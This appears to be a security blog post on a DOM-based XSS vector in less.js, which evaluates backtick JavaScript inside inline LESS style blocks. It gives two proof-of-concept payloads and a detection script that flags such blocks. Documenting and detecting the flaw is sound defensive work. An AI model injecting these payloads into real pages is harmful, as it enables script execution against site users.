LESS and SASS suddenly came to mind while I was researching CSS injection attacks. Both are CSS pre-processors, so I thought they didn't support any client-side operation. That was a mistake...
I saw less.js when visiting the http://lesscss.org/ page.
less.js interprets JavaScript code enclosed in backtick characters inside LESS code, so a DOM-based XSS vulnerability arises at this point.
I published it on Twitter as a new attack vector for LESS.
Also thanks to Rakesh Mane for the shortening!
less.js includes this regex pattern for the type attribute of the style element:
var t=/^text\/(x-)?less$/;
So these payloads are supported:
<style type='text/less'>x{x:`alert(1)`}</style>
<style type='text/x-less'>x{x:`alert(1)`}</style>
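To audit stored or user-supplied markup for this pattern, the sketch below (an added example, not part of the original post or of less.js) scans an HTML string for style elements whose type matches the regex quoted above and whose body contains a backtick expression. The function name findLessScriptBlocks and the SAMPLE input are assumptions made for the illustration; the first two sample lines are the payloads shown above, the other two are constructed.

```javascript
// Added example: flag inline LESS <style> blocks that contain backtick
// JavaScript evaluation. Works on an HTML string, so it needs no DOM.

// Same pattern the post quotes from less.js for the type attribute.
const LESS_TYPE = /^text\/(x-)?less$/;
// <style ...>...</style>, capturing the attribute string and the body.
const STYLE_BLOCK = /<style\b([^>]*)>([\s\S]*?)<\/style\s*>/gi;
// The type attribute value: double-quoted, single-quoted or unquoted.
const TYPE_ATTR = /(?:^|\s)type\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/i;
// A backtick-delimited expression inside the stylesheet body.
const BACKTICK_EXPR = /`([^`]*)`/g;

// Hypothetical helper: returns one finding per matching <style> block.
function findLessScriptBlocks(html) {
  const findings = [];
  for (const m of html.matchAll(STYLE_BLOCK)) {
    const attr = TYPE_ATTR.exec(m[1]);
    if (!attr) continue; // no type attribute: not picked up by this pattern
    const type = (attr[1] ?? attr[2] ?? attr[3]).trim();
    if (!LESS_TYPE.test(type)) continue; // plain CSS or another type
    const expressions = [...m[2].matchAll(BACKTICK_EXPR)].map((e) => e[1]);
    if (expressions.length > 0) {
      findings.push({ type, expressions, offset: m.index });
    }
  }
  return findings;
}

// Sample input: lines 1-2 are the payloads from the post; lines 3-4 are
// constructed negatives (LESS without backticks, CSS with backticks).
const SAMPLE = [
  "<style type='text/less'>x{x:`alert(1)`}</style>",
  "<style type='text/x-less'>x{x:`alert(1)`}</style>",
  '<style type="text/less">@c: #333; a{color:@c}</style>',
  "<style type=\"text/css\">a{content:'`not less`'}</style>",
].join("\n");

for (const f of findLessScriptBlocks(SAMPLE)) {
  console.log(`offset ${f.offset}: type=${f.type} expr=${JSON.stringify(f.expressions)}`);
}
```

Less 3.0 and later ship with inline JavaScript evaluation turned off by default (the `javascriptEnabled` option), so a finding matters most where an older less.js is loaded or that option has been switched on.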